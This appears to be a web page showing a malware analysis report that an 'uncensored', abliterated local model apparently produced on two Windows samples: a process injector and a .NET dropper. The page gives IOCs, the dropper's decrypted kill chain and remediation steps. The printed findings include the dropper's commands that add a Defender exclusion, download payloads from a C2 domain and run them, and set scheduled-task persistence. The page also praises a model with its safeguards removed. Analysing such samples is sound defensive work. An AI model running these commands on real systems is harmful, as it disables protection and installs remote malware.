Skip to main content

Orca's first test: two malware samples

Malware analysisGuideSample

The test​

This is the first real cyber-forensics run of the local OrcaSAQ-2 Cyber stack — the uncensored Qwen3.8-27B twin documented on the OrcaSAQ-2 Cyber and DFlash2 page.

DimensionValue
ModelOrcaSAQ-2-Cyber-27B-Uncensored (abliterated Qwen3.8-27B)
HarnessDeepSeek agent harness, xhigh reasoning effort
PromptPlain language: "find out if these are malware and find IOCs and other useful information worthy of a report"
InputTwo executables in a folder, no hints, no labels
OutputA complete two-sample analysis with verdicts, kill chain, IOC tables and remediation
Why this matters

No signatures, no sandbox detonation, no prior labels. The model worked from first principles: PE structure, import tables, IL, and a hand-rolled AES decrypt of an embedded resource. That is the hard path, and it finished it.

Verdict at a glance​

FileTypeRole
undetek-v10.12.exeNative x86-64 (MSVC)Trojan / process injector + TCP C2
zRanibox6s.exe.NET Framework 4.7.2 (WinForms)Dropper / launcher ("OmnyLoad") — pulls and runs 4 payloads from a Russian C2
Single most important IOC

C2 server a0717206.xsph.ru — URL pattern http://a0717206.xsph.ru/db/<file>. Currently dead (resolves to 0.0.0.0), but block it for recurrence.

Sample 1 — undetek-v10.12.exe​

A native loader whose very name ("undetek" = undetected) advertises its purpose.

Identity​

FieldValue
Size254,976 bytes
SHA-2565d0150547126ac4d1a2b4ebc4ad8f14b65b60faa7d1774909828123bb4d4c062
MD5c66f3ba49fbbf44b9a025bf1a18bec35
FormatPE32+ (64-bit), console subsystem, x86-64, MSVC
Sections.text .rdata .data .pdata .fptable .reloc — no .rsrc (resources/version info stripped)

The import table is the fingerprint​

With no plaintext URLs, IPs or keys in the binary (all built at runtime), the imports tell the story:

LibraryImportsWhat it means
KERNEL32OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread, VirtualProtectEx, WaitForSingleObjectClassic remote process injection
KERNEL32CreateToolhelp32Snapshot, Process32First/NextProcess enumeration (find an injection target)
KERNEL32IsDebuggerPresentAnti-debug
USER32GetAsyncKeyState, SendInputKeystroke capture / input simulation
ADVAPI32RegCreateKeyExA, RegSetValueExA/W, RegOpenKeyExA/W, RegDeleteKeyARegistry persistence
WS2_32 (by ordinal)socket, connect, send, recv, WSAStartup, getaddrinfoRaw-socket TCP C2 (no UDP)

Verdict​

Native x86-64 trojan / injection loader. Combines process injection, process enumeration, input capture, registry persistence, a TCP C2 channel and anti-debug. The "undetected" branding, the stripped .rsrc, and runtime-built strings all point to deliberate AV evasion.

Sample 2 — zRanibox6s.exe ("OmnyLoad")​

The dropper. A .NET WinForms app that elevates to admin, reads the Windows version, and runs a version-specific PowerShell kill chain.

Identity​

FieldValue
Size305,664 bytes
SHA-2567d5f7c61426cff3a8ea36283412bed80904a89b1111520cb7835b7048ad65d61
MD50b1b19e6bdf85c08bec973fb18fa44cb
FormatPE32, GUI subsystem, .NET Framework 4.7.2, WinForms
Assemblyrenamed OmnyLoad, version 1.2.6.9, GUID 8e999c78-c293-43a0-b169-016276344d47, © 2022
ManifestrequestedExecutionLevel = requireAdministrator
Obfuscationsingle-char type names '0'–'5'; config in an AES-encrypted embedded resource

The encrypted config​

The behaviour lives in manifest resource "0" (22,064 bytes) — a raw AES-256-CBC blob that carries its own key material at the front:

PartBytesValue
Key[0:32]216280f1db0411a69e393e5084056991abcca1b09a9be68fd849412755e0c7f3
IV[32:48]f890011b3be9a49f6b25d8d01d9b3886
Ciphertext[48:22064]22,016 bytes (1,376 blocks)
How the config format was recovered

Decrypting resource "0" yields 22,004 bytes (after a 12-byte PKCS7 strip) of a BinaryReader stream: 48 fields, UTF-16LE strings with byte-length prefixes, interleaved with int32 and sbyte values.

The trap: the length prefix counts bytes, not characters. Reading it as a character count (the .NET BinaryReader.ReadString default) misaligns every string and renders ASCII as garbage CJK. Once read as byte lengths — e.g. 0x70 = 112 bytes = 56 chars = the registry path — all 48 fields parse cleanly and consume exactly 22,004 / 22,004 bytes. Structure confirmed.

What the config does​

1. Reads the Windows version from the registry:

HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion → value "ProductName"

2. Branches on the version string:

ProductName containsAction
"Windows 10"Branch 1 (full kill chain)
"Windows 7"Application.Exit() — no-op
"Windows 8"Branch 2
"Windows 11"Branch 3

3. Launches powershell.exe and pipes a batch that first disables Defender for the drop folder:

Add-MpPreference -ExclusionPath "C:\ProgramData\"

4. Downloads and executes four payloads (each: Invoke-WebRequest → save as .exe → run via Invoke-Expression). The .db extension and the Microsoft/dev names are pure camouflage:

C2 fileDropped as
http://a0717206.xsph.ru/db/opti.dbC:\ProgramData\Microsoft\Crypto\devenv.exe
http://a0717206.xsph.ru/db/stip.dbC:\ProgramData\Microsoft\Crypto\SpeechUx.exe
http://a0717206.xsph.ru/db/dbg.dbC:\ProgramData\Microsoft\Crypto\SystemKeys\Microsoft Network Realtime Inspection Service.exe
http://a0717206.xsph.ru/db/ok.dbC:\ProgramData\Microsoft\Crypto\git.exe

5. Persists via scheduled tasks (by branch):

  • Windows 10 — two logon tasks named to blend in:
    SCHTASKS /create /sc ONLOGON /TN "Microsoft\Two" /TR "...\SystemKeys\Microsoft Network Realtime Inspection Service.exe"
    SCHTASKS /create /sc ONLOGON /TN "Microsoft\Two" /TR "...\git.exe"
  • Windows 8 / 11 — also pulls a task definition from the C2 and imports it:
    http://a0717206.xsph.ru/db/start.xml → C:\ProgramData\Microsoft\DiagnosticLogCSP\start.xml
    schtasks /create /tn \Mylibrary\Ape /xml C:\ProgramData\Microsoft\DiagnosticLogCSP\start.xml

6. Shows a decoy error dialog once the payloads are running:

The smokescreen

Text: "The program can't start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem" — title "System Error", icon 16 (MB_ICONHAND). The victim thinks the program simply failed, while the real payloads are already dropped, running and persisted. Timing is deliberate: Thread.Sleep(2500) after the command batch, Sleep(2000) before the dialog.

Verdict​

Admin-elevated .NET dropper ("OmnyLoad"). Version-aware, carves a Defender exclusion for C:\ProgramData\, downloads four disguised executables from a0717206.xsph.ru, persists them via scheduled tasks, then lies with a fake missing-DLL error.

How the two relate​

Same campaign. zRanibox6s.exe (OmnyLoad) is the dropper that pulls live payloads from the C2; undetek-v10.12.exe is the native injector (process injection + TCP C2) that is a staged/dropped component or its companion — the thing that ends up inside a trusted process. The .db / .exe names are camouflage throughout.

IOC summary​

Network​

TypeValueNotes
Domain (C2)a0717206.xsph.ruDead — resolves to 0.0.0.0
URL patternhttp://a0717206.xsph.ru/db/<file>files: opti.db, stip.db, dbg.db, ok.db, start.xml
TransportTCP raw sockets (WS2_32)no UDP

File hashes​

FileSHA-256MD5
undetek-v10.12.exe5d0150547126ac4d1a2b4ebc4ad8f14b65b60faa7d1774909828123bb4d4c062c66f3ba49fbbf44b9a025bf1a18bec35
zRanibox6s.exe7d5f7c61426cff3a8ea36283412bed80904a89b1111520cb7835b7048ad65d610b1b19e6bdf85c08bec973fb18fa44cb

Filesystem (drop locations)​

  • C:\ProgramData\Microsoft\Crypto\devenv.exe
  • C:\ProgramData\Microsoft\Crypto\SpeechUx.exe
  • C:\ProgramData\Microsoft\Crypto\SystemKeys\Microsoft Network Realtime Inspection Service.exe
  • C:\ProgramData\Microsoft\Crypto\git.exe
  • C:\ProgramData\Microsoft\DiagnosticLogCSP\start.xml (Win8 / Win11 only)

Registry​

  • Read: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\ProductName (version detection)
  • Written (native file): persistence keys built at runtime (not plaintext)

Scheduled tasks​

  • Microsoft\Two (ONLOGON) → the dropped Inspection-Service and git.exe (Win10)
  • \Mylibrary\Ape (imported from start.xml) → the dropped payloads (Win8 / Win11)

Behaviour​

  • Launched process: powershell.exe (dropper); dropped exes run as above
  • Defender exclusion added: C:\ProgramData\
  • Anti-debug: IsDebuggerPresent (native file)
  • Input capture: GetAsyncKeyState / SendInput (native file)

Cryptographic​

  • AES-256-CBC key: 216280f1db0411a69e393e5084056991abcca1b09a9be68fd849412755e0c7f3
  • AES-256-CBC IV: f890011b3be9a49f6b25d8d01d9b3886

Misc​

  • Assembly: OmnyLoad, GUID 8e999c78-c293-43a0-b169-016276344d47
  • Decoy dialog: "...MSVCP140.dll is missing..." / title "System Error"
  • Version triggers: "Windows 10", "Windows 7" (exit), "Windows 8", "Windows 11"
  1. Block a0717206.xsph.ru and the http://a0717206.xsph.ru/db/ URL pattern at the proxy/firewall (dead now; block for recurrence).
  2. Delete the dropped files under C:\ProgramData\Microsoft\Crypto\ and C:\ProgramData\Microsoft\DiagnosticLogCSP\start.xml.
  3. Remove the scheduled tasks:
    schtasks /delete /tn "Microsoft\Two" /f
    schtasks /delete /tn "\Mylibrary\Ape" /f
  4. Remove the Defender exclusion:
    Remove-MpPreference -ExclusionPath "C:\ProgramData\"
  5. Hunt the two SHA-256 hashes across the fleet; treat any match as compromised, and re-image where the native injector was present.
  6. Rotate credentials on affected hosts — input simulation plus admin rights makes credential theft plausible.

Method and evidence​

StageTooling
PE parsingobjdump, rabin2 -i (full import table), section/data-dir walk
.NETilspycmd 9.1.0.7988 -il (1,011-line IL dump); resource extraction via an Assembly.LoadFrom + GetManifestResourceStream C# harness
Config recoveryresource "0" → AES-256-CBC decrypt (key/IV embedded) → 48-field BinaryReader parse (UTF-16LE, byte-length prefixes)
C2 livenesslocal DNS + curl → 0.0.0.0, connection failed

What this says about the model​

A 15.7 GB quant running on one desktop GPU, given a one-line prompt, produced a report that a competent human analyst would sign. It chose the right tools, recognised AES-256 from a failed AES-128 attempt, spotted the byte-vs-character length trap in a custom serializer, and separated evidence from interpretation throughout. The stack that makes this practical — binary choice, drafter, sampling — is on the OrcaSAQ-2 Cyber and DFlash2 page.

Analyst's note

Everything here is observation from static analysis. The payloads behind the four .db files were never retrieved (C2 dead at analysis time), so what the second stage ultimately does is inferred from the native injector's imports, not confirmed.

Sample content for layout review, not published research.